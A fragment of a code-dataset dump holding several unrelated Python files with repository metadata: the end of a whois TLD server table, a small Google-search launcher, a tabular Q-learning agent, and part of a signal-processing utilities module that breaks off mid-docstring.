\"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"電訊盈科\"] = {\"_server\": \"whois.nic.xn--fzys8d69uvgm\", \"extend\": \"xn--fzys8d69uvgm\"}\nZZ[\"飞利浦\"] = {\"_server\": \"whois.nic.xn--kcrx77d1x4a\", \"extend\": \"xn--kcrx77d1x4a\"}\nZZ[\"香格里拉\"] = {\"_server\": \"whois.nic.xn--5su34j936bgsg\", \"extend\": \"xn--5su34j936bgsg\", \"_test\": \"nic.xn--5su34j936bgsg\"}\nZZ[\"香港\"] = {\"_server\": \"whois.hkirc.hk\", \"extend\": \"hk\", \"_test\": \"hkirc.hk\"}\n\n# भारतम् xn--h2breg3eve ; still issues with some utf8 strings 2023-08-28 mboot
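\n\n# A hedged sketch, with a hypothetical helper name, of what the private-registry markers below mean for callers: entries flagged \"_privateRegistry\" (or extending \"_privateReg\") expose no public whois endpoint to query.\ndef has_public_whois(tld):\n    entry = ZZ.get(tld, {})\n    return not (entry.get(\"_privateRegistry\") or entry.get(\"extend\") == \"_privateReg\")\n\nZZ[\"aaa\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"able\"] = {\"_privateRegistry\": True} # no whois server found in 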
iana\nZZ[\"accenture\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ad\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"aetna\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"aig\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"americanexpress\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"amex\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"amica\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"analytics\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ao\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"aq\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"aramco\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"athleta\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"axa\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"azure\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"banamex\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bananarepublic\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"baseball\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bb\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bh\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bharti\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bing\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bloomberg\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bm\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"booking\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bs\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bt\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bv\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"calvinklein\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"caravan\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"cbn\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"cbre\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"cg\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"chase\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"cisco\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"citadel\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"citi\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"citic\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ck\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"coupon\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"cu\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"dell\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"dhl\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"discover\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"dj\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"dupont\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"er\"] = 
{\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"farmers\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ferrero\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"fk\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"flickr\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"flir\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"food\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ford\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"frontier\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ftr\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gap\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gb\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gm\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gn\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"grainger\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"grocery\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gu\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"guardian\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gw\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"hbo\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"homegoods\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"homesense\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"hotels\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"hotmail\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"hsbc\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"hyatt\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ieee\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"intuit\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ipiranga\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"itau\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jm\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jmp\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jnj\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jo\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jpmorgan\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jprs\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kh\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kinder\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"km\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kp\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kpmg\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kpn\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kw\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"lanxess\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"lifeinsurance\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"lilly\"] = {\"_privateRegistry\": True} # no whois server found in 
iana\nZZ[\"lincoln\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"living\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"lr\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"maif\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"marshalls\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mattel\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mc\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"merckmsd\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mh\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"microsoft\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mil\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mint\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mlb\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"moto\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"msd\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mt\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mv\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"nba\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ne\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"netflix\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"neustar\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"nfl\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ni\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"nike\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"nr\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ntt\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"office\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"oldnavy\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"open\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pfizer\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pg\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pictet\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ping\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pn\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pramerica\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"praxi\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pru\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"prudential\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"rocher\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sakura\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sas\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sener\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sj\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"skype\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sohu\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"song\"] = {\"_privateRegistry\": True} # no whois 
server found in iana\nZZ[\"staples\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"statefarm\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sz\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"target\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"tj\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"tjmaxx\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"tjx\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"tkmaxx\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"vi\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"vivo\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"weather\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"weatherchannel\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"williamhill\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"windows\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"winners\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xbox\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--1ck2e1b\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--54b7fta0cc\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--bck1b9a5dre4c\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--cck2b3b\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--czr694b\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--eckvdtc9d\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--fct429k\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--fzc2c9e2c\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--g2xx48c\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--gckr3f0f\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--gk3at1e\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--imr513n\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--jvr189m\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--l1acc\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgba3a3ejt\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgbai9azgqp6j\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgbayh7gpa\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgbc0a9azcg\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgbcpq6gpa1a\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgbpl2fh\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--nyqy26a\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--otu796d\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--qxam\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--rhqv96g\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--rovu88b\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--wgbh1c\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--xkc2al3hye2a\"] = {\"_privateRegistry\": 
True} # no whois server found in iana\nZZ[\"yahoo\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"yandex\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"zero\"] = {\"_privateRegistry\": True} # no whois server found in iana\n\nZZ[\"onion\"] = {\"_privateRegistry\": True} # this is a special case https://tools.ietf.org/html/rfc7686\n\n# unknown tld abb, abb, abb, abb, whois.nic.abb,\n# unknown tld arpa, arpa, arpa, arpa, whois.iana.org,\n# unknown tld bn, bn, bn, bn, whois.bnnic.bn,\n# unknown tld bw, bw, bw, bw, whois.nic.net.bw,\n# unknown tld crown, crown, crown, crown, whois.nic.crown,\n# unknown tld crs, crs, crs, crs, whois.nic.crs,\n# unknown tld fj, fj, fj, fj, www.whois.fj,\n# unknown tld gp, gp, gp, gp, whois.nic.gp,\n# unknown tld hm, hm, hm, hm, whois.registry.hm,\n# unknown tld il, il, il, il, whois.isoc.org.il,\n# unknown tld int, int, int, int, whois.iana.org,\n# unknown tld iq, iq, iq, iq, whois.cmc.iq,\n# unknown tld mm, mm, mm, mm, whois.registry.gov.mm,\n# unknown tld mw, mw, mw, mw, whois.nic.mw,\n# unknown tld pf, pf, pf, pf, whois.registry.pf,\n# unknown tld post, post, post, post, whois.dotpostregistry.net,\n# unknown tld realtor, realtor, realtor, realtor, whois.nic.realtor,\n# unknown tld weir, weir, weir, weir, whois.nic.weir,\n# unknown tld xn--4dbrk0ce, ישראל, ישראל, ישראל, whois.isoc.org.il,\n# unknown tld xn--55qw42g, 公益, 公益, 公益, whois.conac.cn,\n# unknown tld xn--80ao21a, қаз, қаз, қаз, whois.nic.kz,\n# unknown tld xn--90a3ac, срб, срб, срб, whois.rnids.rs,\n# unknown tld xn--90ae, бг, бг, бг, whois.imena.bg,\n# unknown tld xn--90ais, бел, бел, бел, whois.cctld.by,\n# unknown tld xn--d1acj3b, дети, дети, дети, whois.nic.xn--d1acj3b,\n# unknown tld xn--j1amh, укр, укр, укр, whois.dotukr.com,\n# unknown tld xn--lgbbat1ad8j, الجزائر, الجزائر, الجزائر, whois.nic.dz,\n# unknown tld xn--mgba3a4f16a, ایران, ایران, ایران, whois.nic.ir,\n# unknown tld xn--mgbaam7a8h, امارات, امارات, امارات, whois.aeda.net.ae,\n# unknown tld xn--mgberp4a5d4ar, السعودية, السعودية, السعودية, whois.nic.net.sa,\n# unknown tld xn--mgbtx2b, عراق, عراق, عراق, whois.cmc.iq,\n# unknown tld xn--mgbx4cd0ab, مليسيا, مليسيا, مليسيا, whois.mynic.my,\n# unknown tld xn--node, გე, გე, გე, whois.itdc.ge,\n# unknown tld xn--pgbs0dh, تونس, تونس, تونس, whois.ati.tn,\n# unknown tld xn--q7ce6a, ລາວ, ລາວ, ລາວ, whois.nic.la,\n# unknown tld xn--y9a3aq, հայ, հայ, հայ, whois.amnic.net,\n# unknown tld xn--ygbi2ammx, فلسطين, فلسطين, فلسطين, whois.pnina.ps,\n# unknown tld xn--zfr164b, 政务, 政务, 政务, whois.conac.cn,\n","repo_name":"DannyCork/python-whois","sub_path":"whois/tldDb/tld_regexpr.py","file_name":"tld_regexpr.py","file_ext":"py","file_size_in_byte":161584,"program_lang":"python","lang":"en","doc_type":"code","stars":280,"dataset":"github-code","pt":"2"} +{"seq_id":"33546955408","text":"import webbrowser\n\n\ndef searchGoogle(searchQuery):\n '''\n searchGoogle - Search for user input in google\n\n Args:\n searchQuery (string): What user wants to search in google\n ''' \n\n edge_path=\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\"\n webbrowser.register('edge', None, webbrowser.BackgroundBrowser(edge_path))\n\n searchQuery = str(searchQuery)\n searchString = searchQuery.replace(' ', '+')\n\n url = f\"https://www.google.com/search?q={searchString}\"\n\n # Example url = \"https://www.google.com/search?q=birds+in+australia\"\n\n 
webbrowser.get('edge').open(f\"{url}\")","repo_name":"SuprakashB/Lucy","sub_path":"web/searchGoogle.py","file_name":"searchGoogle.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7754027508","text":"import numpy as np\nimport gym\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm as tqdm\nfrom PIL import Image, ImageDraw, ImageFont\nfrom random import sample\n\nclass TabularQAgent:\n # Setting things up\n def __init__(self, env, eps=0.2, gamma = 1):\n self.noStates = env.observation_space.n\n self.noActions = env.action_space.n\n self.env = env\n self.Q = np.zeros((self.noStates, self.noActions))\n self.eps = eps\n self.gamma = gamma\n self.updates = 0\n \n def reset(self):\n self.Q = np.zeros((self.noStates, self.noActions))\n \n # Function to do eps-greedy exploration\n def select_action(self, greedy=False):\n if(greedy):\n return np.argmax(self.Q[self.env.state, :])\n \n thresh = np.random.rand()\n if(thresh < self.eps): # Explore\n return self.env.action_space.sample()\n else: # Exploit\n greedy_actions = np.where(self.Q[self.env.state, :]==np.amax(self.Q[self.env.state, :]))\n return np.random.choice(greedy_actions[0])\n \n # Function for SARSA policy updates\n# def updatePolicySARSA(self, S, A, R, S2, A2, alpha):\n# self.updates = self.updates + 1\n# self.Q[S,A] = self.Q[S,A] + alpha * (R + self.gamma * self.Q[S2, A2] - self.Q[S,A])\n \n # Function for Qlearning policy updates\n def update(self, S, A, R, S2, lr=0.1):\n self.updates = self.updates + 1\n self.Q[S,A] = self.Q[S,A] + lr * (R + self.gamma * np.max(self.Q[S2, :]) - self.Q[S,A])\n \n def train(self, no_episodes=200, horizon=1000, lr=0.1, track=True):\n self.reset()\n R_vec = []\n ts = 0\n \n for i in tqdm(range(no_episodes), leave=True):\n state = self.env.reset()\n for t in range(horizon):\n action = self.select_action()\n state2, r, done, _ = self.env.step(action)\n ts += 1\n self.update(state, action, r, state2, lr=lr)\n if(track):\n R_vec.append(r)\n if(done):\n break\n state = state2\n\n return R_vec, self.Q, ts\n \n def train_multiple_ts(self, runs=5, max_ts=20000, horizon=1000, lr=0.1, track=True):\n \"\"\"\n This function trains the agent on the environment multiple times. 
The stopping\n criterion is number of timesteps.\n \"\"\"\n R_mat = []; Q_vec=[]\n for j in range(runs):\n R_vec = []\n self.reset()\n ts = 0\n state = self.env.reset()\n for i in tqdm(range(max_ts), leave=True):\n action = self.select_action()\n state2, r, done, _ = self.env.step(action)\n self.update(state, action, r, state2, lr=lr)\n if(track):\n R_vec.append(r)\n\n if(done):\n state = self.env.reset()\n continue\n\n state = state2\n\n R_mat.append(R_vec)\n Q_vec.append(self.Q)\n\n return R_mat, Q_vec","repo_name":"psurya1994/fun","sub_path":"agents_tabular/tabularQAgent.py","file_name":"tabularQAgent.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"13554439716","text":"#!/usr/bin/env python\n\n\"\"\"\nSignal Processing Extras\n========================\n\nThis module contains various signal processing tools and\nalgorithms that are not currently in scipy.signal.\n\nError Analysis Routines\n-----------------------\n- db Convert a power value to decibels.\n- rms Compute the root mean squared value of an array.\n- snr Compute the signal-to-noise ratio of two signals.\n\nFiltering Routines\n------------------\n- downsample Downsample an array.\n- fftfilt Apply an FIR filter to a signal using the overlap-add method.\n- remezord Determine filter parameters for Remez algorithm.\n- upsample Upsample an array.\n\nMiscellaneous Routines\n----------------------\n- nextpow2 Return n such that 2**n >= abs(x).\n- oddceil Return the smallest odd integer no less than x.\n- oddround Return the odd integer nearest to x.\n\n\"\"\"\n\n__all__ = ['db', 'downsample', 'fftfilt', 'nextpow2', 'oddceil', 'oddround',\n 'remezord', 'rms', 'snr', 'upsample']\n\nfrom numpy import abs, arange, arctan, argmin, asarray, ceil, floor, \\\n hstack, int, log10, log2, max, mean, min, mod, pi, shape, \\\n sqrt, zeros\n\n# Since the fft function in scipy is faster than that in numpy, try to\n# import the former before falling back to the latter:\ntry:\n from scipy.fftpack import fft, ifft\nexcept ImportError:\n from numpy.fft import fft, ifft\n\n# --- Error analysis functions ---\n\ndef db(x):\n \"\"\"Convert the specified power value to decibels assuming a\n reference value of 1.\"\"\"\n\n return 10*log10(x)\n\ndef rms(x):\n \"\"\"Compute the root mean squared value of the specified array x.\"\"\"\n\n return sqrt(mean(abs(x)**2))\n\ndef snr(u, u_rec, k_min=0, k_max=None):\n \"\"\"Compute the signal-to-noise ratio (in dB) of a signal given its\n reconstruction.\n\n Parameters\n ----------\n u : numpy array of floats\n Original signal.\n u_rec : numpy array of floats\n Reconstructed signal.\n k_min : int\n Lower index into the signal over which to compute the SNR.\n k_max : int\n Upper index into the signal over which to compute the SNR.\n\n \"\"\"\n\n if len(u) != len(u_rec):\n raise ValueError('u and u_rec must be the same length')\n\n return db(mean(u[k_min:k_max]**2))-db(mean((u[k_min:k_max]-u_rec[k_min:k_max])**2))\n\n# --- Sampling functions ---\n\ndef upsample(x, n, offset=0):\n \"\"\"Upsample a vector x by inserting n-1 zeros between every\n entry. An optional offset may be specified.\"\"\"\n\n if len(shape(x)) > 1:\n raise ValueError('x must be a vector')\n y = zeros(len(x)*n, asarray(x).dtype)\n y[offset::n] = x\n return y\n\ndef downsample(x, n, offset=0):\n \"\"\"Downsample a vector x by returning every nth entry. 
An optional\n offset may be specified.\"\"\"\n\n if len(shape(x)) > 1:\n raise ValueError('x must be a vector')\n return x[offset::n]\n\n# --- Filtering functions ---\n\ndef nextpow2(x):\n \"\"\"Return the first integer N such that 2**N >= abs(x)\"\"\"\n\n return ceil(log2(abs(x)))\n\ndef fftfilt(b, x, *n):\n \"\"\"Filter the signal x with the FIR filter described by the\n coefficients in b using the overlap-add method. If the FFT\n length n is not specified, it and the overlap-add block length\n are selected so as to minimize the computational cost of\n the filtering operation.\"\"\"\n\n N_x = len(x)\n N_b = len(b)\n\n # Determine the FFT length to use:\n if len(n):\n\n # Use the specified FFT length (rounded up to the nearest\n # power of 2), provided that it is no less than the filter\n # length:\n n = n[0]\n if n != int(n) or n <= 0:\n raise ValueError('n must be a nonnegative integer')\n if n < N_b:\n n = N_b\n N_fft = 2**nextpow2(n)\n else:\n\n if N_x > N_b:\n\n # When the filter length is smaller than the signal,\n # choose the FFT length and block size that minimize the\n # FLOPS cost. Since the cost for a length-N FFT is\n # (N/2)*log2(N) and the filtering operation of each block\n # involves 2 FFT operations and N multiplications, the\n # cost of the overlap-add method for 1 length-N block is\n # N*(1+log2(N)). For the sake of efficiency, only FFT\n # lengths that are powers of 2 are considered:\n N = 2**arange(ceil(log2(N_b)), floor(log2(N_x)))\n cost = ceil(N_x/(N-N_b+1))*N*(log2(N)+1)\n N_fft = N[argmin(cost)]\n\n else:\n\n # When the filter length is at least as long as the signal,\n # filter the signal using a single block:\n N_fft = 2**nextpow2(N_b+N_x-1)\n\n N_fft = int(N_fft)\n\n # Compute the block length:\n L = int(N_fft - N_b + 1)\n\n # Compute the transform of the filter:\n H = fft(b, N_fft)\n\n y = zeros(N_x,float)\n i = 0\n while i <= N_x:\n il = min([i+L,N_x])\n k = min([i+N_fft,N_x])\n yt = ifft(fft(x[i:il],N_fft)*H,N_fft) # Overlap..\n y[i:k] = y[i:k] + yt[:k-i] # and add\n i += L\n return y\n\ndef oddround(x):\n \"\"\"Return the nearest odd integer from x.\"\"\"\n\n return x-mod(x,2)+1\n\ndef oddceil(x):\n \"\"\"Return the smallest odd integer no less than x.\"\"\"\n\n return oddround(x+1)\n\ndef remlplen_herrmann(fp, fs, dp, ds):\n \"\"\"Determine the length of the low pass filter with passband frequency\n fp, stopband frequency fs, passband ripple dp, and stopband ripple ds.\n fp and fs must be normalized with respect to the sampling frequency.\n Note that the filter order is one less than the filter length.\n\n References\n ----------\n O. Herrmann, L.R. Raviner, and D.S.K. Chan, Practical Design Rules for\n Optimum Finite Impulse Response Low-Pass Digital Filters, Bell Syst. Tech.\n Jour., 52(6):769-799, Jul./Aug. 1973.\n\n \"\"\"\n\n dF = fs-fp\n a = [5.309e-3,7.114e-2,-4.761e-1,-2.66e-3,-5.941e-1,-4.278e-1]\n b = [11.01217, 0.51244]\n Dinf = log10(ds)*(a[0]*log10(dp)**2+a[1]*log10(dp)+a[2])+ \\\n a[3]*log10(dp)**2+a[4]*log10(dp)+a[5]\n f = b[0]+b[1]*(log10(dp)-log10(ds))\n N1 = Dinf/dF-f*dF+1\n\n return int(oddround(N1))\n\ndef remlplen_kaiser(fp, fs, dp, ds):\n \"\"\"Determine the length of the low pass filter with passband frequency\n fp, stopband frequency fs, passband ripple dp, and stopband ripple ds.\n fp and fs must be normalized with respect to the sampling frequency.\n Note that the filter order is one less than the filter length.\n\n References\n ----------\n J.F. Kaiser, Nonrecursive Digital Filter Design Using I_0-sinh Window\n function, Proc. 
IEEE Int. Symp. Circuits and Systems, 20-23, April 1974.\n\n \"\"\"\n\n dF = fs-fp\n N2 = (-20*log10(sqrt(dp*ds))-13.0)/(14.6*dF)+1.0\n\n return int(oddceil(N2))\n\ndef remlplen_ichige(fp, fs, dp, ds):\n \"\"\"Determine the length of the low pass filter with passband frequency\n fp, stopband frequency fs, passband ripple dp, and stopband ripple ds.\n fp and fs must be normalized with respect to the sampling frequency.\n Note that the filter order is one less than the filter length.\n\n References\n ----------\n K. Ichige, M. Iwaki, and R. Ishii, Accurate Estimation of Minimum\n Filter Length for Optimum FIR Digital Filters, IEEE Transactions on\n Circuits and Systems, 47(10):1008-1017, October 2000.\n\n \"\"\"\n \n dF = fs-fp\n v = lambda dF,dp:2.325*((-log10(dp))**-0.445)*dF**(-1.39)\n g = lambda fp,dF,d:(2.0/pi)*arctan(v(dF,dp)*(1.0/fp-1.0/(0.5-dF)))\n h = lambda fp,dF,c:(2.0/pi)*arctan((c/dF)*(1.0/fp-1.0/(0.5-dF)))\n Nc = ceil(1.0+(1.101/dF)*(-log10(2.0*dp))**1.1)\n Nm = (0.52/dF)*log10(dp/ds)*(-log10(dp))**0.17\n N3 = ceil(Nc*(g(fp,dF,dp)+g(0.5-dF-fp,dF,dp)+1.0)/3.0)\n DN = ceil(Nm*(h(fp,dF,1.1)-(h(0.5-dF-fp,dF,0.29)-1.0)/2.0))\n N4 = N3+DN\n\n return int(N4)\n\ndef remezord(freqs, amps, rips, Hz=1, alg='ichige'):\n \"\"\"Calculate the parameters required by the Remez exchange algorithm to\n construct a finite impulse response (FIR) filter that approximately\n meets the specified design.\n\n Parameters\n ----------\n freqs : array_like of floats\n A monotonic sequence of band edges specified in Hertz. All\n elements must be non-negative and less than 1/2 the\n sampling frequency as given by the Hz parameter.\n amps : array_like of floats\n A sequence containing the amplitudes of the signal to be\n filtered over the various bands.\n rips : array_like of floats\n A sequence specifying the maximum ripples of each band.\n alg : 